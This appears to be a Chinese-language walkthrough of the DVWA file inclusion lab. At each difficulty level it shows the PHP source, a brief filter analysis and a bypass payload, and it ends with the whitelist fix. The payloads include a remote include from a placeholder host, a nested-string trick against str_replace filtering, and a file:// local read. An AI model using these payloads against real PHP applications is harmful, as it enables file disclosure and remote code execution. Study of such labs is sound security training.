1.low级别
<?php // The page we wish to display $file = $_GET[ 'page' ]; ?>分析: 没有过滤
解: ?page=http://xx.xx.xx.xx/1.txt
2.medium级别
<?php // The page we wish to display $file = $_GET[ 'page' ]; // Input validation $file = str_replace( array( "http://", "https://" ), "", $file ); $file = str_replace( array( "../", "..\"" ), "", $file ); ?>分析: 过滤了http:// https:// …/ … 嵌套一下就能过
解: ?page=hthttp://tp://xx.xx.xx.xx/1.txt
3.high级别
<?php // The page we wish to display $file = $_GET[ 'page' ]; // Input validation if( !fnmatch( "file*", $file ) && $file != "include.php" ) { // This isn't the page we want! echo "ERROR: File not found!"; exit; } ?>分析: fnmatch() 函数根据指定的模式来匹配文件名或字符串。
解: file://D://1.txt
4.impossible级别
<?php // The page we wish to display $file = $_GET[ 'page' ]; // Only allow include.php or file{1..3}.php if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) { // This isn't the page we want! echo "ERROR: File not found!"; exit; } ?>分析: 用了白名单的方式,规定了传入的参数名必须为这些。
